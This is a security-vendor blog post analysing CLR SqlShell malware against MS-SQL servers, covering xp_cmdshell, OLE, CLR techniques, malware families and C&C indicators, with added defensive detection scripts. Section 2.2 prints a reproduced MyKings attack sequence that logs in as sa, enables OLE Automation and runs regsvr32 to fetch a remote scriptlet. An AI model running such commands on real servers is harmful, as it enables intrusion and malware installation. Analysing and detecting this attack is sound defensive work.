Analysis of CLR SqlShell Used to Attack MS-SQL Servers

This blog post will analyze the CLR SqlShell malware that is being used to target MS-SQL servers. Similar to WebShell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS-SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior. MS-SQL servers support a method known as CLR Stored Procedure which allows the usage of expanded features, and SqlShell is a DLL created with this method. CLR Stored Procedure is one of the major methods that threat actors can use to execute malicious commands in MS-SQL servers along with the xp_cmdshell command.

While CLR Stored Procedure contains a feature to execute given commands, it is possible that SqlShell was created for a legitimate purpose. However, it is being used in almost all attacks that target MS-SQL servers. Threat actors typically use SqlShell as a means to ultimately install malware such as CoinMiner or ransomware. In this blog post, we will analyze and cover the features supported by various types of SqlShells and the actual cases where they were used in attacks.


1. Overview

MS-SQL servers that have simple passwords and are publicly exposed to the external internet are one of the main attack vectors used when targeting Windows systems. Threat actors find poorly managed MS-SQL servers and scan them before carrying out brute force or dictionary attacks to log in with admin privileges. Once the threat actors have reached this point, they then utilize various means to install malware and gain control over the infected systems.

After a threat actor logs in to an MS-SQL server with an admin account, the most common method used to install malware involves the xp_cmdshell command. Through this command, malicious commands that run in the Windows environment can be executed. In addition, other means to execute Windows commands exist, such as registering commands to the OLE Stored Procedure or registering malicious commands as tasks in MS-SQL Agent Jobs. Aside from these command execution methods, another technique exists where an executable that implements specific features is created and registered so that it performs those features. MS-SQL servers support Extended Stored Procedure and CLR Stored Procedure DLLs for such expanded features, allowing developers to create and register DLLs with the features they need.

AhnLab Security Emergency response Center (ASEC) has published quarterly statistics through the ASEC Report on malware strains that have been used in attacks against poorly managed MS-SQL servers. [1] According to the statistics, there is a considerable amount of malware categorized as CLR Shell (SqlShell). All of these are malware in the form of CLR Stored Procedure DLLs. Instead of using these pieces of malware on their own, most threat actors use them during the installation process of other malware, such as ransomware and CoinMiner.

Figure 1. ASEC Report – Statistics for Q4 2022

The above figure covers the features provided by MS-SQL servers that can execute Windows OS commands and categorizes them by their actual malware. SqlShells come in various forms, some of which can execute commands, download/upload files, and even perform privilege escalation. Some do not receive the threat actor’s commands at all and instead act as downloaders that download and install malware from specific URLs.


2. Attack Methods Against MS-SQL

Generally, threat actors and malware search for environments where the MS-SQL service has been installed by scanning for servers with open 1433 ports. After the scanning process, they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks. Additionally, most features that make it possible to execute Windows OS commands require an SQL Admin (sa), in other words, an admin account.

There are cases where the threat actor does not personally perform the scan and dictionary attack, but instead, the malware spreads by self-propagating to poorly managed MS-SQL servers. The most notable in this case is the LemonDuck CoinMiner. The following is a list of sa account passwords used by LemonDuck when performing dictionary attacks.

Figure 2. List of passwords used by LemonDuck for dictionary attacks

In addition, while LemonDuck uses dictionary attacks on MS-SQL servers during its internal propagation process, also known as lateral movement, Kingminer [2] and Vollgar CoinMiner [3] employ brute force attacks on externally accessible MS-SQL servers.

After obtaining an sa account or sa account privileges, the threat actor or malware either executes malicious commands or installs the actual malware to obtain control over the infected system. Additionally, sa account privileges only grant control over the MS-SQL database servers, and not the Windows OS itself. In other words, although the execution of SQL commands is allowed, features that can directly impact the Windows OS are not provided by default.

However, MS-SQL provides various features that allow OS commands to be executed in the Windows OS, and exploiting them ultimately allows the execution of OS commands. The section below will cover the methods that allow the execution of OS commands through MS-SQL database servers. Because these features are not default SQL commands and carry security risks, a majority of them are disabled by default. However, admin accounts can enable these settings, meaning that logging in to an admin account makes it possible to access these features. Therefore, control over a Windows OS can be obtained as a result of acquiring an sa account.


2.1. xp_cmdshell

The xp_cmdshell command executes the command it receives as an argument in the Windows shell. Windows commands executed through xp_cmdshell are run by the sqlservr.exe process via “cmd.exe /c”.

Among actual malware, LemonDuck downloads additional malware by utilizing xp_cmdshell. LemonDuck also includes a re-registration process, so it is prepared for cases where xp_cmdshell has been unregistered rather than merely disabled.

Figure 3. LemonDuck using xp_cmdshell commands


2.2. OLE Stored Procedure

The method that uses the OLE Stored Procedure involves exploiting OLE’s feature to execute other applications, in this case the malicious commands or malware. Like xp_cmdshell, OLE is disabled by default, so it must be enabled first.

The following is a reproduction of the actual attack routine used by the MyKings CoinMiner malware.

CMD > sqlcmd -S [IP address] -U sa -P testsql
1> sp_configure 'show advanced options', 1;
2> RECONFIGURE;
3> go
1> sp_configure 'Ole Automation Procedures',1;
2> RECONFIGURE;
3> go
1> DECLARE @shell INT
2> EXEC SP_OAcreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@shell OUTPUT
3> EXEC SP_OAMETHOD @shell,'run',null, 'regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll';
4> go

Figure 4. Process tree when exploiting OLE Stored Procedure
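
As an added example (not part of the original analysis), the Python below applies the two process relationships described in 2.1 and 2.2 to process-creation records: sqlservr.exe running "cmd.exe /c", and sqlservr.exe launching regsvr32 with a remote scriptlet. The event field names, the finding labels and the sample records are assumptions constructed for illustration.

```python
import ntpath
import re

# Constructed process-creation records (fields modeled on Sysmon Event ID 1).
# Paths and hosts are placeholders, not telemetry from the report.
SQLSERVR = (r"C:\Program Files\Microsoft SQL Server"
            r"\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe")
SAMPLE_EVENTS = [
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c whoami'},
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /u /s /i:http://example.invalid/v.sct scrobj.dll"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": SQLSERVR.upper(),
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

# regsvr32 pointed at a scriptlet fetched over HTTP(S), as in the OLE case.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)
# The "/c" switch that xp_cmdshell uses when it hands a command to cmd.exe.
CMD_SLASH_C = re.compile(r"(?:^|\s)/c(?:\s|$)", re.IGNORECASE)


def _name(path):
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()


def classify(event):
    """Return a finding label for a child of sqlservr.exe, or None otherwise."""
    if _name(event["parent"]) != "sqlservr.exe":
        return None
    child, cmdline = _name(event["image"]), event["cmdline"]
    if child == "regsvr32.exe" and REMOTE_SCRIPTLET.search(cmdline):
        return "ole-remote-scriptlet"
    if child == "cmd.exe" and CMD_SLASH_C.search(cmdline):
        return "cmd-slash-c-from-sqlservr"
    # Any other child of the database engine still deserves a look.
    return "other-child-review"


def scan(events):
    """Return (index, label, cmdline) for every event that classify() flags."""
    findings = []
    for index, event in enumerate(events):
        label = classify(event)
        if label:
            findings.append((index, label, event["cmdline"]))
    return findings


if __name__ == "__main__":
    for index, label, cmdline in scan(SAMPLE_EVENTS):
        print(f"event {index}: {label}: {cmdline}")
```

Payloads that run inside sqlservr.exe itself, such as the in-memory shellcode case in 3.1.3, create no child process and will not appear in this view.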


2.3. MS-SQL Agent Jobs

Like the method mentioned above, using the feature called MS-SQL Agent Jobs allows the registration of tasks that execute Windows commands. SQL Server Agent supports the simple CmdExec method that executes OS commands, and the ActiveScripting method that makes it possible to use JS or VBS scripts.


2.4. Extended Stored Procedure

MS-SQL servers support a method called the Extended Stored Procedure in order to provide an expanded range of features. Threat actors create a malicious DLL, register it with the sp_addextendedproc command, and then call its export function, which loads the malicious DLL and runs the export function responsible for the malicious behavior.


2.5. CLR Stored Procedure

The CLR Stored Procedure is similar to the above Extended Stored Procedure, but it can be distinguished by its use of .NET DLLs. In addition, as with xp_cmdshell, an activation process is required before the CLR Stored Procedure can be registered and used.

As mentioned above, LemonDuck uses not only xp_cmdshell, but also the CLR Stored Procedure.

Figure 5. LemonDuck using CLR Stored Procedure assembly


3. CLR SqlShell Analysis

3.1. Basic Type

In this section, SqlShells that only provide basic features such as command execution and file download will be covered. SqlShell is often used to install additional malware during attack processes, so even these simple forms are often found during attacks.

3.1.1. Command Execution (LEMONDUCK)

LemonDuck registers and uses the ExecCommand() method of the StoredProcedures class, and the ExecCommand() method calls the RunCommand() method internally. The DLL is named evilclr.dll, and its only functionality is a command execution routine. LemonDuck uses the CLR assembly’s ExecCommand() function registered in this way to download additional payloads.

Figure 6. CLR SqlShell of LemonDuck

3.1.2. Download Command Support (SHAW20211224)

Next is an SqlShell named “shaw20211224.dll” which provides not only the RunCommand() function that executes received commands, but also the DownloadRun() function that downloads external files, and the PutDatas() function that steals files from the received directories.

Figure 7. Export function of shaw20211224.dll

3.1.3. Shellcode Execution (Metasploit)

Additionally, Metasploit, a penetration testing tool, also supports attacks that target these MS-SQL servers. Metasploit provides various techniques ranging from the aforementioned dictionary attacks and privilege escalation, to executing various OS commands, and of course, the CLR SqlShell technique is also provided.

Metasploit installs the following SqlShell during the attack process, which is responsible for executing the received shellcode in the memory. Metasploit also provides simple forms of reverse shell, bind shell, and the Meterpreter backdoor which provides various other features. Metasploit executes a shellcode that installs the threat actor’s desired malware.

Figure 8. SqlShell provided by Metasploit

The following figure is a log from our AhnLab Smart Defense (ASD), which displays a threat actor breaching a poorly managed MS-SQL server and installing Metasploit’s “SqlClrPayload.dll” before executing the Metasploit’s Meterpreter backdoor in the memory of the sqlservr.exe process.

Figure 9. ASD log of attack case that used Metasploit


3.2. Types That Provide Extended Features

The SqlShells covered above have relatively simple forms, but threat actors are capable of utilizing SqlShells with a much broader range of features. The more features that are provided, the easier it becomes for threat actors to perform malicious behaviors such as malware installation.

3.2.1. SQLHELPER (TRIGONA Ransomware)

Most notably, an SqlShell named SqlHelper is also often used in attacks. Due to the high number of variations, it is believed that the source code is publicly available. Even the relatively simple malware below provides various features such as command execution, adding user accounts, tunneling, and file handling.

Figure 10. Features supported by SqlHelper

In addition, the SqlShell found in the previously covered Trigona ransomware [4] attack case was also SqlHelper. The SqlHelper used by the Trigona threat actor also contains an MS16-032 vulnerability attack routine for privilege escalation. The threat actor used this to execute the MS-SQL service with escalated privileges, and with that privilege, they registered the Trigona ransomware to the service.

3.2.2. CLRSQL (SHADOWFORCE Threat Group)

The SqlShell named CLRSQL is also similar to SqlHelper. When looking at the supported functions, such as tasks related to files/directories/processes/accounts, its similarity to WebShell malware is apparent.

When compared to the types covered above, CLRSQL SqlShells have even more features. For example, there are some that have been implemented with PingCastle. PingCastle is a tool that can be used to collect information required for attacks in Active Directory environments.

Figure 11. SqlShell implemented with PingCastle

CLRSQL SqlShell implemented with PingCastle is also used during the ShadowForce threat group’s attack processes. ShadowForce is a threat group that has been active since 2013. They are known for their attacks focused on Korean businesses and agencies. Their tendency to mainly attack MS-SQL servers is one of their defining characteristics. [5]

Judging from how other malware that targets poorly managed MS-SQL servers is also found in systems attacked by ShadowForce, it can be inferred that ShadowForce also targets systems that use poor account credentials.

The ASD log below shows the sequential creation of ShadowForce’s other malware after “Tmp1C4E.tmp”, which is the SqlShell, has been installed first. As such, ShadowForce uses the CLR Stored Procedure malware to install additional malware after breaching poorly managed MS-SQL servers. This flow of events can be observed similarly in most of their attack processes.

Figure 12. ShadowForce’s attack log confirmed by ASD

3.2.3. CLR_MODULE (SHADOWFORCE Threat Group)

The SqlShell named CLR_module is also similar to CLRSQL as it supports PingCastle along with other similar features. In terms of differences, CLR_module also provides privilege escalation tools such as BadPotato and EfsPotato in addition to the features provided by CLRSQL. It can be assumed that these additional features are the reason why there are many cases where CLRSQL is also found during the attack processes of ShadowForce.

Figure 13. Privilege escalation feature also supported by CLR_module SqlShell


3.3. CoinMiner Installation

In the section above, we covered the forms similar to WebShell that receive and execute specific commands from the threat actor. This section covers SqlShells that implement specific features themselves. Most of these forms aim to install CoinMiner, and therefore, the SqlShells used in these attacks usually function as downloaders or droppers.

3.3.1. MRBMINER

MrbMiner was one of the main CoinMiners that was distributed to MS-SQL servers in the past. [6] It was first confirmed in 2020, and it ultimately installs XMRig CoinMiner. The SqlShell used during the installation process of MrbMiner possesses its own analysis disruption techniques, but unlike the forms mentioned above, it only has a download feature to install MrbMiner.

Figure 14. SqlShell of MrbMiner

Although they may vary according to the version, the following hard-coded C&C URLs can be directly confirmed.

Figure 15. C&C URLs hard-coded in MrbMiner SqlShell

3.3.2. MYKINGS

MyKings CoinMiner is distributed through various means, and is used in several methods of attacks against MS-SQL servers as well. The first method is the OLE Stored Procedure covered above, and there are other methods like the following, where CLR assembly is used via the ExecCode.dll file.

Figure 16. Downloader CLR Stored Procedure of MyKings ExecCode.dll

The SqlStoredProcedure1() method downloads a text file from a specific URL, which contains URLs where additional payloads can be downloaded. Afterward, it parses these URLs to install the actual MyKings payload. ExecCode.dll has a simple form like the one shown above, but more complex forms have been discovered among the CLR assemblies used by MyKings.

Similar to ExecCode.dll, MSSqlInterface.dll is also executed through the StoredProcedures class and SqlStoredProcedure() method, but it also provides additional features. First, during its initial routine, it decrypts the C&C URL, which is encoded with a 1-byte XOR using the key 0xFA. Then, in its main loop, it regularly sends the basic information that has been stolen to the C&C server, and it downloads and executes files and shellcode.

Figure 17. Functions provided by the Operate class and the encoded C&C URL
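
For analysts triaging a suspected sample, the single-byte XOR decoding described above can be reproduced as follows. This is an added example, not code from MSSqlInterface.dll or from the original post; the blob and the placeholder endpoint are constructed, and only the key 0xFA comes from the analysis. It goes slightly beyond the text by also trying all 256 keys, in case a sample uses a different one.

```python
import re

REPORTED_KEY = 0xFA  # single-byte XOR key given in the analysis above

# Matches http(s) URLs made of printable ASCII once the bytes are decoded.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[\x21-\x7e]*)?")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (encoding and decoding are identical)."""
    return bytes(b ^ key for b in data)


# Constructed sample: a placeholder endpoint encoded with 0xFA and surrounded
# by filler bytes, standing in for a string region carved from a sample.
PLACEHOLDER_URL = b"http://c2.example.invalid:8080/report"
SAMPLE_BLOB = b"\x00\x13\x37" + xor_bytes(PLACEHOLDER_URL, REPORTED_KEY) + b"\x00\x00"


def decode_urls(blob: bytes, key: int) -> list:
    """Decode the whole blob with `key` and return any URL-shaped strings."""
    decoded = xor_bytes(blob, key)
    return [m.group().decode("ascii") for m in URL_RE.finditer(decoded)]


def recover_keys(blob: bytes) -> dict:
    """Try all 256 one-byte keys; map each key that reveals a URL to its URLs."""
    hits = {}
    for key in range(256):
        urls = decode_urls(blob, key)
        if urls:
            hits[key] = urls
    return hits


if __name__ == "__main__":
    print(decode_urls(SAMPLE_BLOB, REPORTED_KEY))
    for key, urls in recover_keys(SAMPLE_BLOB).items():
        print(f"key 0x{key:02X}: {urls}")
```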

3.3.3. LOVEMINER

As a CoinMiner that is being distributed to vulnerable MS-SQL servers, LoveMiner has been found with downloaders in the form of exe executables and CLR Stored Procedure. [7]

Figure 18. CLR Stored Procedure of LoveMiner

The LoveMiner downloader accesses a specific URL where it downloads a Base64-encoded CoinMiner and saves it in the “C:\windows\temp\0c0134c0cbebf48be8c95920f5ea74fc.txt” path. If the file already exists, it reads the file, decodes the Base64, and loads the result into memory.

Figure 19. CoinMiner encoded in Base64 and decrypted routine
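
The staging pattern described above, a text file whose Base64 content decodes to an executable image, can be checked during triage. The following Python is an added example, not code from the original post or from LoveMiner; the function names are hypothetical and the sample inputs are constructed header stubs that contain no executable code.

```python
import base64
import binascii
import struct


def constructed_pe_stub() -> bytes:
    """Constructed 68-byte stub: an empty DOS header plus the PE signature."""
    dos_header = bytearray(0x40)
    dos_header[0:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x40)  # e_lfanew: PE signature offset
    return bytes(dos_header) + b"PE\x00\x00"


# Constructed inputs: line-wrapped Base64 of the stub, Base64 of plain text,
# and a text file that is not Base64 at all.
STAGED_TEXT = base64.encodebytes(constructed_pe_stub())
PLAIN_B64 = base64.b64encode(b"pool=example.invalid:3333")
NOT_B64 = b"ver=7\r\n"


def decode_staged_pe(text: bytes):
    """Return the decoded bytes if `text` is Base64 of a PE image, else None."""
    compact = b"".join(text.split())      # tolerate line-wrapped Base64
    # Cheap pre-filter: Base64 of anything starting with "MZ" starts with "TV".
    if not compact.startswith(b"TV"):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", raw, 0x3C)
    # The PE signature must lie inside the decoded data at the stated offset.
    if e_lfanew + 4 > len(raw) or raw[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return raw


if __name__ == "__main__":
    for label, sample in (("staged", STAGED_TEXT), ("plain", PLAIN_B64),
                          ("not-b64", NOT_B64)):
        result = decode_staged_pe(sample)
        print(label, "PE image" if result else "no PE image")
```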

After ultimately loading the CoinMiner DLL, the ExecSql() export function is called with the argument. This DLL is a customized XMRig that checks if the first string received as an argument is “getmoney#2021”. Afterward, it mines for Monero coins after parsing the mining pool address and ID received as the third argument.

Among the SqlShells that install LoveMiner, some even come in the form of a dropper instead of a downloader. XMRig CoinMiner is saved in the “gmp” internal resources, and SqlShell is responsible for loading this in the memory. As a customized XMRig, gmp configures the information required for mining like the mining pool address from the initial routine.

Figure 20. LoveMiner SqlShell in the form of a dropper


3.4. Proxyware Installation

Proxyware is a program that shares a part of the Internet bandwidth that is currently available on a system with others. Users who install the program are usually paid a certain amount of cash in exchange for providing the bandwidth. While users can earn some money from installing proxyware on their systems, they should know they are taking risks by allowing external users to perform certain behaviors by using their networks. For instance, users cannot know in detail which companies the proxyware platforms claim are using their services. Even if the platforms can verify their customers on their own, it is impossible to check whether the user’s bandwidth will be maliciously exploited in the future.

Malware that installs proxyware without the consent of users has been covered before here in the ASEC Blog. [8] Systems that are infected with the malware have their network bandwidth stolen for threat actors to gain profit. The method of earning profit by using the infected system’s resources is similar to that of CoinMiner.

As can be seen in the ASD log, the threat actor installed a proxyware with the name “sdk.mdf” in an MS-SQL server and used an SqlShell to execute the proxyware and steal bandwidth. “sdk.mdf” is the DLL file responsible for the actual features, and the file itself only possesses the features provided by proxyware platforms.

Figure 21. Installation log of proxyware and SqlShell

However, the “Tmp417C.tmp” SqlShell that is created together loads the proxyware “sdk.mdf” and calls the p2p_start() export function so that it operates without users knowing. When calling p2p_start(), the email address that receives the profits must be passed as an argument, and the threat actor’s email address can be confirmed in the following figure.

Figure 22. Proxyware executed via SqlShell

Additionally, the name of the SqlShell is “SqlServerWorks.CLR.P2P.dll”, which is similar to LoveMiner’s SqlShell, and it is assumed that they belong to the same threat actor as actual ASD logs have shown that LoveMiner and proxyware are often installed together.


4. Conclusion

Recently, the SqlShell malware has been installed on poorly managed MS-SQL database servers. SqlShell can install additional malware such as backdoors, CoinMiners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell.

Typical attacks that target MS-SQL database servers include brute force and dictionary attacks on systems where account credentials are poorly managed. Besides servers built directly as database servers, many of the MS-SQL servers targeted in attacks are ones that were installed together with ERP and business solutions during their installation process.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks. They should also use security programs such as firewalls for database servers accessible from outside to restrict access by threat actors.


IOC

C&C URL
– 88.214.26[.]9:13785: Metasploit Meterpreter
– vihansoft[.]ir:3341: MrbMiner
– adminserver[.]online:1001: MrbMiner
– pcadmin[.]online:1001: MrbMiner
– 54.36.10[.]73:1001: MrbMiner


The post Analysis of CLR SqlShell Used to Attack MS-SQL Servers appeared first on ASEC BLOG.
